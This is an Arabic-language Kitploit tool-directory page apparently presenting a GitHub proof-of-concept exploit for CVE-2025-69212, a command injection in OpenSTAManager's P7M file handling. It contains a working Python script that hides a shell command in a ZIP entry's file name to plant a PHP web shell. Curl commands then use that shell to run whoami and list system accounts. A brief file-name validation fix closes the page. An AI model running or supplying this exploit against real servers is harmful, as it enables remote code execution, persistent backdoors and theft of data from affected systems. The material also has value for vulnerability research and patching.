Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenSTA-Exploit — إثبات المفهوم (PoC) لـ CVE-2025-69212 المتعلق بمعالجة ملفات P7M | Kitploit
أدوات/GitHubGitHub/lolw0/opensta-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHublolw0/opensta-exploit

OpenSTA-Exploit

إثبات المفهوم (PoC) لـ CVE-2025-69212 المتعلق بمعالجة ملفات P7M

عرض المستودع
منذ 7 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OpenSTA-Exploit

صورة

البياناتالتفاصيل
معرف CVECVE-2025-69212
درجة الثغرةحرجة (9.4)
CWE78: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر نظام التشغيل
الإصدارات المتأثرةOpenSTAManager <= 2.9.8
متجه الهجومرفع ملف ZIP يحتوي على ملف .p7m باسم ملف خبيث
المصادقةمطلوبة
التأثيرتنفيذ أوامر نظام عشوائية على الخادم

شرح الاستغلال

  1. يخزن أمر شل في المتغير cmd (والذي ينشئ ملفًا يسمى SHELL.php يحتوي على كود PHP يمكنه تنفيذ الأوامر).
  2. يبني اسم ملف خاص يخفي الأمر من متغير cmd ويحفظه في المتغير malicious_file.
  3. ينشئ ملف ZIP جديدًا يسمى exploit.zip ويفتحه للكتابة.
  4. يضيف ملفًا إلى ZIP. اسمه هو المتغير malicious_file.
  5. يتم حقن اسم الملف الخبيث في أمر exec().

PoC (إثبات المفهوم)

1. إنشاء ملف zip للحقن

root@kitploit:~
import zipfile
import time

print("Creating zip file...")
time.sleep(1)

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_file, b"")

2. تنفيذ الملف ورفعه

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
صورة

صورة

3. نتيجة الاستغلال

يفشل تحليل XML بعد تنفيذ الأمر

root@kitploit:~
HTTP/1.1 500 Internal Server Error

"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}

3. التحقق وتنفيذ التعليمات البرمجية عن بُعد

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"

www-data

lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'

root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin



يؤدي إلى...


الإصلاح

**الإصلاح البسيط هو التحقق من صحة أسماء الملفات قبل المعالجة (السماح فقط بالأحرف الأبجدية الرقمية والنقاط والشرطات والشرطات السفلية لتخطي أسماء الملفات غير الصالحة)

root@kitploit:~
foreach ($files_xml as $xml) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; 
    }
    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

(أو يمكنك ببساطة التحديث، lol)

تنزيل الأداة
الهجومالتفاصيل
تنفيذ التعليمات البرمجية عن بُعداختراق كامل للخادم مع تنفيذ الأوامر
تسريب البياناتالوصول إلى جميع بيانات التطبيق وقاعدة البيانات
تصعيد الامتيازاتتصعيد محتمل إذا كان خادم الويب يعمل بصلاحيات مرتفعة أو كان عرضة للثغرات
الاستمراريةتثبيت أبواب خلفية والحفاظ على الوصول مع مرور الوقت
الحركة الجانبيةالانتقال إلى أنظمة/مستخدمين آخرين على الشبكة